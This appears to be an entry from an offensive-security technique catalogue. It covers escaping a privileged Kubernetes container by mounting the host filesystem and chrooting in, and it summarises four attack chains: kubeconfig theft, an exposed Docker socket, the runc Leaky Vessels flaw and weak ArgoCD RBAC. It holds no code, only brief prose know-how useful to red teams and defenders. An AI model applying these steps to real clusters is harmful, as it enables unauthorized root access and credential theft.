K-PRIV-CONTAINERPrivilege Escalation

Privileged Container Escape

spec.containers[].securityContext.privileged: true — mount the host filesystem and chroot in.

§ Where this technique fits

K-PRIV-CONTAINER is catalogued under the Privilege Escalation tactic of the offensive-security kill-chain. It appears in 4 approved dossiers in the registry, typically at step 3.8 on average.

§ Dossiers chaining this technique

Privileged pod escape → cluster admin
GenericWrite on a Deployment in the kube-system namespace lets you launch a privileged pod; the pod mounts the host filesystem and steals the kubeconfig of cluster-admin.
step 3 / 7
Docker socket exposed in pod → host root
A workload mounts /var/run/docker.sock for convenience; spawn a container with the host root mounted, then chroot in for root on the node.
step 3 / 6
CVE-2024-21626 (Leaky Vessels) → container escape
Outdated runc lets a malicious image escape during 'docker build' or 'docker run' via a leaked file descriptor pointing at the host filesystem.
step 4 / 5
ArgoCD weak RBAC → cluster admin via custom Application
ArgoCD installed with the default admin user and broad RBAC. Attacker creates an Application pointing at attacker manifests — ArgoCD syncs them with cluster-admin.
step 5 / 6

§ What commonly comes next

01
hostPath Volume Mount
K-HOSTPATH-MOUNT · Privilege Escalation
seen 4×

§ Where this technique fits

§ Dossiers chaining this technique

Privileged pod escape → cluster admin

Docker socket exposed in pod → host root

CVE-2024-21626 (Leaky Vessels) → container escape

ArgoCD weak RBAC → cluster admin via custom Application

§ What commonly comes next